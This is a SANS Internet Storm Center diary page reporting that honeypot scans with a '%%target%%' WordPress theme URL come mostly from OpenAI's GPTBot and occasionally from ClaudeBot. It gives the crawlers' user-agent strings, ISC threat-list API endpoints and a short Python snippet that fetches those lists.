From Highly Obfuscated Batch File to XWorm and Redline, (Mon, Aug 26th)


If you follow my diaries, you probably already know that one of my favorite topics around malware is obfuscation. I'm often impressed by the crazy techniques attackers use to make reverse engineers' lives more difficult. Last week, I spotted a file called "crypted.bat" (SHA256: 453c017e02e6ce747d605081ad78bf210b3d0004a056d1f65dd1f21c9bf13a9a) which is detected by no antivirus according to VT[1]. It deserved to be investigated!

OpenAI Scans for Honeypots. Artificially Malicious? Action Abuse?, (Thu, Aug 22nd)


For a while now, I have seen scans that contain the pattern "%%target%%" in the URL. For example, today this particular URL is popular:

/%%target%%/wp-content/themes/twentytwentyone/style.css

I have been ignoring these scans so far. The "wp-content" in the URL suggests that this is yet another stupid WordPress scan, maybe for the plugin vulnerability of the day. "twentytwentyone" points to a popular WordPress theme that apparently can be, HOLD YOUR BREATH, used for version disclosure [1]. In short, this is the normal stupid stuff that I usually do not waste time on. Running WordPress with random themes and plugins? Good luck. I hope you at least add a "!" at the end of your password (which must be "password") to make it so much more secure.

The scan itself looked broken. The "%%target%%" pattern looked like it was supposed to be replaced with something.

So stupid hackers scanning stupid WordPress installs. I ignored it.

Leave it up to Xavier to educate me that this isn't stupid but artificially intelligent!

(Screenshot: Xavier Mertens' Slack message about a user agent containing GPTBot)

So, as it turns out, these scans come predominantly from systems that identify themselves as part of OpenAI's content-stealing machine. In its battle to keep up with Google's indexing prowess, OpenAI has decided that more is better and is now scanning random IPs, including honeypots, for content. Another option may be that ChatGPT "actions" can be used to trigger these scans.

The easiest way to identify OpenAI's bots is the user-agent:

Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)

I looked at all scans containing "%%target%%" since July, and they can all be assigned to OpenAI.

(Graph: scans for "%%target%%" each day, showing that they almost exclusively originate from OpenAI)

The graph shows the total number of scans for "%%target%%" each day in orange, and the scans originating from OpenAI in blue. For almost all days, the scans from OpenAI explain almost all the scans for "%%target%%" URLs.

With OpenAI finding value in data like this, its little cousin Claude can't be far behind. And indeed, we do see some scans in our honeypots that may be originating from Anthropic's Claude, but they are few and far between compared to OpenAI. For example, we had this URL being hit on August 20th:

/legal-content/CS/AUTO/?uri=celex%3A32010R1099

The user-agent used by Claude is: 

Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)

To help manage this traffic, I added a category to our threatlist API. For IP addresses linked to OpenAI use:

https://isc.sans.edu/api/threatlist/openai?json 

OpenAI published a list of ranges here: https://platform.openai.com/docs/actions/production . Based on our data, a few additional IPs in adjacent network ranges are also scanning, indicating that they are likely also owned by OpenAI (they exhibit the same behavior).

or for Anthropic:

https://isc.sans.edu/api/threatlist/anthropic?json
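A minimal Python sketch for pulling either list into your own tooling (I am only printing the raw records here, since downstream parsing depends on which fields you need):

import requests

# Fetch the ISC threat list of IP addresses linked to OpenAI crawlers
resp = requests.get("https://isc.sans.edu/api/threatlist/openai?json", timeout=30)
resp.raise_for_status()

# Each entry describes one address or range; swap "openai" for "anthropic"
# in the URL to get the Claude-related list instead
for entry in resp.json():
    print(entry)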

[1] https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/wordpress-theme-twenty-twenty-one-out-of-date/

 


Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu
Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.